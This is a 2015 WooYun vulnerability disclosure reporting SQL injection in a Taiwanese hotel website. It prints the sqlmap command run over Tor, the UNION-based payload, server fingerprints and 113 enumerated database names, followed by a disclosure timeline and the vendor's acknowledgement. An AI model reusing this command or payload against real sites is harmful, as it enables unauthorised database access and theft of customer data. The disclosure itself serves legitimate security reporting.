当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115445

漏洞标题:台湾5星级酒店墾丁凱撒大飯店SQL注入涉及113个库

相关厂商:墾丁凱撒大飯店

漏洞作者: 路人甲

提交时间:2015-05-21 23:50

修复时间:2015-07-07 02:20

公开时间:2015-07-07 02:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-21: 细节已通知厂商并且等待厂商处理中
2015-05-23: 厂商已经确认,细节仅向厂商公开
2015-06-02: 细节向核心白帽子及相关领域专家公开
2015-06-12: 细节向普通白帽子公开
2015-06-22: 细节向实习白帽子公开
2015-07-07: 细节向公众公开

简要描述:

台湾5星级酒店墾丁凱撒大飯店SQL注入,涉及113个库
竟然是FreeBSD, 竟然是union-based的sql injection, 竟然有113个库

详细说明:

./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --threads 2 -u "http://kenting.caesarpark.com.tw/news.php?No=642&NewsType=3&test1=63&test2=235&test3=63" --technique=U --dbs
---
Parameter: No (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: No=642 UNION ALL SELECT 33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,CONCAT(0x7178767a71,0x66707a4166546448556b,0x716a716b71),33-- &NewsType=3&test1=63&test2=235&test3=63
---
[15:32:49] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.2.5, Apache 2.2.24
back-end DBMS: MySQL 5.0

漏洞证明:

available databases [113]:
[*] a_shan
[*] AGENT_DEMO
[*] airbus
[*] alacarte
[*] ATAMI
[*] AZUREHOTEL
[*] bendon
[*] CAESAR
[*] CAESARPARK
[*] capu
[*] CHIHAN
[*] CHINGSHEUI
[*] COCO
[*] CROWNE
[*] DAAN
[*] DEBAO
[*] DEMO
[*] DHMC_MOBILE
[*] DREAMTOWN
[*] duncan
[*] duncan2
[*] EDISON
[*] ETAIWAN
[*] EZ889
[*] EZHOTEL
[*] EZHotelJack
[*] FISHERHOTEL
[*] fltravel
[*] FORTEHOTEL
[*] GINKGO
[*] GOSHEN
[*] GRACEFUL
[*] GRANDFORWARD
[*] GREENHOTEL
[*] GRHOLIDAY
[*] GRHOLIDAY_CART
[*] HANDSOMEHOTEL
[*] HEFONG
[*] HEFONG_CHAHSI
[*] HEFONG_KELLY
[*] HEFONGVILLA
[*] HIBISCUS
[*] HOLLAND
[*] HOTEL_ASIA
[*] HOTEL_BANKS_MOBILE
[*] HotelMaster
[*] HOTELMASTER
[*] HOTELOCEAN
[*] HOTHOTEL
[*] HOYARESORT
[*] IMAGE
[*] IMAGE_GOLD
[*] information_schema
[*] JIHOTEL
[*] KAVALAN
[*] KENTINGCAESAR
[*] KENTINGCAESAR2
[*] KTCHATEAU
[*] kters
[*] KYOTO
[*] LEADER
[*] LINDEN
[*] LINDEN_UTF8
[*] LISHIN
[*] lost+found
[*] MARSHAL
[*] MEDIA
[*] MINGAO
[*] MIYI
[*] MRTHOTEL
[*] mysql
[*] NONGANHOTEL
[*] OFFICIALSITE_DEMO
[*] PACIFICSPA
[*] PLCRESORT_DEMO
[*] PLCRESORT_WEB
[*] postfix
[*] RETAIL
[*] ROYAL_CHAHSI
[*] ROYAL_TAIPEI
[*] ROYALJETWAY
[*] SAAJUST
[*] sales
[*] SAUALKEH
[*] SEALIFE
[*] SHANGRILA
[*] SHANGRILA_2
[*] SHANGRILA_EN
[*] SHERWOOD
[*] SHINEYOU
[*] SPRINGRESORT
[*] STAR
[*] SVRESORT
[*] TAIAN
[*] taikwucomtw
[*] TAIWAN_GO_FORM
[*] TAROKO
[*] TAYIH
[*] TEMPUS
[*] TICKETGO
[*] TIENLAI
[*] TOURBUS
[*] TWAMD
[*] UNIQUEHOLIDAY
[*] VICTORIA
[*] VICTORIA2
[*] virtual_mail
[*] WELFARE
[*] XIAYUN
[*] xiediving
[*] XIMEN
[*] YAM
[*] YIYUAN

修复方案:

过滤
或者
WAF

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-05-23 02:18

厂商回复:

感謝通報

最新状态:

暂无